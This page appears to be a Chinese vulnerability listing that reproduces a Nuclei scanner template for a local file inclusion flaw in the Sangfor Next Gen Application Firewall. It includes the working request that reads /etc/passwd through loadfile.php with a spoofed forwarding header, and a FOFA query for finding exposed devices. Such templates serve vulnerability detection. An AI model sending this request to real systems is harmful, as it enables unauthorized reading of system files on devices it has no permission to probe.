sangfor-nextgen-lfi: Sangfor Next Gen Application Firewall - Arbitary File Read

日期: 2025-08-01 | 影响软件: Sangfor Next Gen Application Firewall | POC: 已公开

漏洞描述

Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.

PoC代码[已公开]

id: sangfor-nextgen-lfi

info:
  name: Sangfor Next Gen Application Firewall - Arbitary File Read
  author: DhiyaneshDk
  severity: high
  description: |
    Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.
  reference:
    - https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/
  classification:
    cpe: cpe:2.3:a:sangfor:next-gen_application_firewall:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sangfor
    product: next-gen_application_firewall
    fofa-query: title="SANGFOR | NGAF"
  tags: sangfor,lfi,vuln

http:
  - raw:
      - |
        GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
        Host: {{Hostname}}
        y-forwarded-for: 127.0.0.1

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: word
        part: header
        words:
          - 'filename="passwd"'
          - 'application/octet-stream'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204413515627824bb4032b1ee77a78a3d6758e78b56e619e7408ce4486d7013a0202200e02f7872f2e3a3e4a1ac4c678f56ba41bfd18c50ad2c9af543ef89f470f91b2:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐